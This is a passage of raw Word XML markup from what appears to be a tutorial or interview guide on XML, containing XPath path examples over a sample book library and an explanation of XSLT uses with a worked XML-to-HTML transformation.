      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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ibrary/book[2]/author</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A4E3D" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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This selects the author of the second book element in the library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E830C8" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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Path to all title elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A45274" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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ibrary/book/title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC1842" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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This selects all title elements inside book elements under the root library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633BA05F" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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Path to the price of the book with lang="en"</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01845B38" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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ibrary/book/title[@lang='en']/parent::book/price</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAC2CBD" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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This selects the price of the book where the title has an attribute lang="en".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613D2DBE" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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Path to all price values greater than 20</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310CA96" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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ibrary/book[price&gt;20]/price</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363899EF" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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This selects the price element for books where the price is greater than 20.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34763D92" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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Path to the title of all books (irrespective of language)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3724C90E" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1941EEB6" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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This selects all title elements in the entire document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116F80AE" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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Path to the publisher of the last book</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA84E67" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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ibrary/book[last()]/publisher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD4B24A" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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lastRenderedPageBreak/>
        <w:t>This selects the publisher element of the last book element in the library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C897E0" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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Path to the publicationDate of the book by David Smith</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187741CC" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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ibrary/book[author='David Smith']/publicationDate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3223E549" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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This selects the publicationDate of the book where the author is "David Smith".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261FE183" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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E7AD7F">
          <v:rect id="_x0000_i1980" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B16B6" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A431FD5" w14:textId="77777777" w:rsidR="00B11364" w:rsidRPr="00585961" w:rsidRDefault="00B11364"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These XPath paths help navigate through the XML structure to access specific elements or attributes. By defining the paths in a hierarchical manner, you can easily locate and manipulate data in XML documents based on your requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538CFBBE" w14:textId="1A3FD137" w:rsidR="004F5B43" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004F5B4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472915F">
          <v:rect id="_x0000_i1981" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41569FE7" w14:textId="162E0803" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00A56A4D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="404" w:name="_Toc196307884"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of XSLT</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="404"/>
    </w:p>
    <w:p w14:paraId="6578C1DD" w14:textId="3D43847D" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9" w:rsidP="00585961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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XSLT (Extensible Stylesheet Language Transformations)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a language used for transforming XML documents into other formats, such as HTML, plain text, or even another XML format. It is widely used for styling and converting XML data for display purposes or data integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B2199E" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9"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Key Uses of XSLT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8DB68A" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1797"/>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Transform XML to HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: XSLT allows you to transform XML data into a format that can be rendered by a web browser, typically HTML. This is particularly useful for displaying dynamic data on websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA09471"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Converting XML data into a user-friendly HTML table or list for display in a web page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B7165" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1797"/>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Transform XML to Other XML Formats</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: XSLT can be used to convert XML documents from one structure to another. This is useful when different systems or applications need to exchange data but require different XML formats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9E7F7"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Changing the structure of an XML document to match a different schema or to prepare data for integration with another application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5174B204" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1797"/>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Data Filtering and Extraction</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: XSLT can be used to filter and extract specific data from XML files. You can select specific nodes, attributes, or values using XPath expressions and transform the data accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DE21A4"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Extracting only specific information from an XML document, such as all the authors from a list of books, and outputting it into another format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BD506A" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1797"/>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XML Data Presentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: XSLT can be used to apply formatting or structure to the XML data for human readability. This is done by transforming XML data into HTML or plain text, making it more suitable for presentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C2E96B"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Converting an XML file containing product information into a well-formatted HTML page that can be displayed to users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8191D3" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1797"/>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eparation of Data and Presentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By using XSLT, you can separate the data (XML) from its presentation (HTML or other formats). This allows for cleaner code, easier maintenance, and the ability to reuse the same XML data in different contexts with different stylesheets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC4317B"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reusing the same XML data in various presentations (e.g., showing a list of books in HTML, generating a PDF report, or exporting it to CSV).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AB0FC1" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1797"/>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Creating Reports</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: XSLT can be used to format XML data for reports. It allows you to apply templates to XML data and format it into structured reports, such as tables, charts, or text documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5888314F"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creating a summary report from an XML file containing employee data, and transforming it into a well-organized HTML or PDF report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD88780" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9"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Example: XML to HTML Transformation with XSLT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD3379B" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9"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XML Input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0903C3"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t;library&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE20A23"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book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CABA055"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itle&gt;Introduction to XML&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F329885"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author&gt;John Doe&lt;/author&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531216A2"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price&gt;29.99&lt;/price&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FB297A"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book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79732B59"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book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5252E340"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itle&gt;Advanced XML Programming&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E4FA12"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author&gt;David Smith&lt;/author&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5A6CFC"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price&gt;49.95&lt;/price&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571407B1"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book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3677ECCA"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t;/library&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C3D2E8" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9"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lastRenderedPageBreak/>
        <w:t>XSLT Stylesheet to Convert XML to HTML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407ED9BC"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t;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D73D7C3"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t;xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40294535"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xsl:output method="html" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A50D547"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A12C228"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xsl:template match="/library"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAF6FAB"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html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115BC59F"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body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B917B7"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h2&gt;Library Book List&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF8EBD"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able border="1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A3B889"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r&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB2B5F"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h&gt;Title&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EBBFEA"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h&gt;Author&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2E5D22"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h&gt;Price&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB7B51F"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r&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AC42F4"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xsl:for-each select="book"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C913234"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r&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293FCB23"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d&gt;&lt;xsl:value-of select="title" /&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F60B3D1"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d&gt;&lt;xsl:value-of select="author" /&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDF11F3"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d&gt;&lt;xsl:value-of select="price" /&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C05386"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r&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7850F0A7"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xsl:for-each&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D209E"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able&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6249213E"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body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8D2B2E"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html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BE4D85"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xsl:template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B09793"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t;/xsl:stylesheet&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B394FA" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9"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Output (HTML):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C672BF7"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t;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0E60FF"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body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BABEE4D"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h2&gt;Library Book List&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE1EDBE"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able border="1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6A6FE9"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r&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515407F9"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h&gt;Title&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC2BC7E"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h&gt;Author&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC5E9DF"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h&gt;Price&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA9B70D"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r&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE0398D"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r&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510CA92B"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d&gt;Introduction to XML&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC2B361"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d&gt;John Doe&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61688B7E"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d&gt;29.99&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BC5956"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r&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBBF5B0"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r&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD1251"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d&gt;Advanced XML Programming&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654492CD"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d&gt;David Smith&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C0B976"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d&gt;49.95&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0697A86E"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r&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03253F29"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table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F4A80A"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    &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF5E8E"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lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3B2CAD" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9"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Summary of XSLT Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2DC06F" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1798"/>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Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It allows you to transform XML data into various output formats, such as HTML, text, or another XML structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193C6F7E" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1798"/>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eparation of concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Helps separate the XML data from the display logic, making it easier to maintain and update both.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8DF058" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1798"/>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Powerful Querying</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: XSLT uses XPath for powerful querying and transformation of XML data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664A22F4" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1798"/>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lastRenderedPageBreak/>
        <w:t>Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
